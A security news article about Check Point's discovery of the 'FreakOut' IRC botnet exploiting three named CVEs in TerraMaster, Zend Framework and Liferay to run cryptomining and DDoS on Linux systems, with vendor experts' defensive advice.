Researchers discovered a new Internet Relay Chat (IRC) bot Tuesday that exploited three vulnerabilities to launch distributed denial of service attacks, cryptomining and other security lapses on Linux systems.
Dubbed “FreakOut” by CheckPoint researchers, stemming from the name Freak, the code author’s name, the bot activated in November 2020 and has been running ever since with 300 current users and five channels. One active channel called #update includes 186 exploited devices that communicate with the IRC server.
Based on the malware features, the researchers said the attackers use the compromised systems for further attacks, spreading laterally across the victim company’s network, or launching attacks on outside targets while masquerading as the compromised company.
The attacks use these three vulnerabilities to take aim at devices that run on the following:
- CVE-2020-28188: TerraMaster Operating System, used to manage TerraMaster network attached storage servers.
- CVE-2021-3007: Zend Framework, used to build web applications and services using PHP, with more than 570 million installations.
- CVE-2020-7961: Liferay Portal, a web app platform written in Java that offers features relevant for the development of portals and websites.
The researchers said in all the attacks involving the three CVEs, the attacker first try running different syntaxes of OS commands to download and execute a Python script named “out.py.” After the script gets downloaded and given permissions (using the “chmod” command), the attacker tries to run it using Python 2. The researchers point out that while Python 2 reached end-of-life last year, they believe the attacker assumes the victim’s device has this deprecated product installed.
Yaniv Bar-Dayan, co-founder and CEO at Vulcan Cyber, said the FreakOut attacks are similar to what we saw with SolarWinds Sunburst in that hackers are exploiting multiple vulnerabilities and attack vectors.
“These hacks are sophisticated and count on the odds that more known vulnerabilities have not been remediated or mitigated leaving the door wide open,” Bar-Dayan said. “Organizations must adopt a vulnerability remediation campaign approach that requires all the people, processes and tools across security and IT to get on the same page and work towards a ‘get fix done’ outcome.”
Wade Lance, CTO at Illusive, recommended a dual approach. First, security teams should shore up system defenses by performing traditional vulnerability management processes and patching to eliminate high risk system vulnerabilities. Second, because some vulnerabilities might be zero-day, security teams should develop a strategy to detect and thwart attacker reconnaissance and lateral movement activities, necessary to identify and exploit targeted systems.
“For the latter consider an active defense strategy and solution like that defined by MITRE Shield,” Lance said.
Derek Manky, chief of security insights and global threat alliances at Fortinet’s FortiGuard Labs, said half of the top ten attacks FortiGuard Labs monitors aim to perform operating system and command injection attacks on IoT devices. For organizations and security teams, Manky said it’s crucial to not just double down on security for one Linux platform, but take aim with a multi-factored approach: ensure all devices are on segmented, local networks and only in necessary scenarios be publicly routed, and in those cases, absolutely use VPN and multi factor authentication for login.
“Organizations should also make sure IoT/Edge devices are visible and inspected on the network through east-west and north-south traffic,” Manky said. “This means supporting inspection for CVE exploitation with IPS from lateral movement on the same network segment, and also external initial exploitation for public facing devices.”
Chad Anderson, senior security researcher at DomainTools, added that the vulnerabilities exploited have been patched in relevant software and while adversary’s Python obfuscation is not particularly sophisticated, malware doesn’t have to be sophisticated to do damage.
“So far we can see a good 300 or more infected hosts, but the delivery domain has already been blocklisted by a number of industry standard blocklists so most security devices should block communication with the domain,” Anderson said. “This does not mean however that security professionals should let their guard down since the Zend Framework is widely used. We recommend that anyone using the Zend Framework in production confirm that they have updated this year to cover the most recent exploit used in this attack.”